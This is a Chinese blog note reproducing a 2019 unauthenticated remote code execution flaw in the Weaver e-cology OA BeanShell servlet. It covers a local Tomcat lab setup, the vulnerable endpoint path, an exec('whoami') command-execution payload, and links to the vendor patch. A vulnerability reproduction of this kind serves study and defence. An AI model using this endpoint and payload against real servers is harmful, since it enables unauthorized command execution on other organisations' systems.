泛微e-cology OA Beanshell組件遠程程式碼執行漏洞復現
- 2019 年 10 月 7 日
- 筆記
0X1 漏洞概述
泛微e-cologyOA協同商務系統是專為大中型企業製作的OA辦公系統,支援PC端、移動端和微信端同時辦公,完美的解決了距離的問題,內置大量智慧化辦公工具,讓各部門之間的協作變得暢通而又簡單,是中大型企業辦公的必備神器。
泛微e-cology依託全新的設計理念,全新的管理思想為中大型組織創建全新的高效協同辦公環境,讓組織內部的溝通協助暢通無阻!為組織構建一個內部的baidu進行知識分享,讓組織內部的制度流程落地有效執行,讓組織內的資訊能夠自動找人,滿足各類崗位的辦公所需!
2019年9月17日,泛微OA更新了一個安全問題,修復了一個遠程程式碼執行漏洞。泛微 e-cology OA 系統自帶 BeanShell 組件且開放未授權訪問,攻擊者調用 BeanShell 組件介面可直接在目標伺服器上執行任意命令。
漏洞影響版本
泛微e-cology<=9.0
0X2 環境搭建
由於e-cology是在雲端,因此找了很多的安裝包都是e-office,還花了點冤枉錢,而e-office是PHP程式碼的,所以小夥伴們就不要花費冤枉錢和時間去尋找漏洞版本的安裝包了。
官方在官網上已經發布了修補程式公告了,因此在線使用測試的版本肯定也已經修復漏洞了,最後經過不斷尋找,在github上發現已經有其他研究人員通過此次漏洞的源頭組件Beanshell已經寫好了一個demo,對於像我這樣不擅長程式碼的人簡直是福音啊



demo下載鏈接如下
https://github.com/jas502n/e-cology
下載完成之後,將weaver.war複製到tomcat的webapp目錄中

tomcat的環境配置就不介紹了,不會的同學請自行度娘。
然後啟動tomcat

瀏覽器訪問環境
http://127.0.0.1:8080/weaver #ip:port/weaver

這樣環境就已經搭建好了
0X3 漏洞利用
點擊首頁的Go to the BeanShell servlet會跳轉到漏洞觸發頁面
http://127.0.0.1:8080/weaver/bsh.servlet.BshServlet

在Script標籤位置處執行命令,點擊下面的Evaluate即可執行
exec("whoami")


當前用戶是管理員帳號

命令執行成功。
0X4 漏洞修復
官網已經發布了最新的修補程式包,下載鏈接
https://www.weaver.com.cn/cs/securityDownload.asp
參考使用手冊更新即可。
0X5 參考鏈接
https://github.com/jas502n/e-cology https://www.weaver.com.cn/cs/securityDownload.asp https://www.cnblogs.com/Oran9e/p/11566824.html https://blog.csdn.net/sun1318578251/article/details/101117946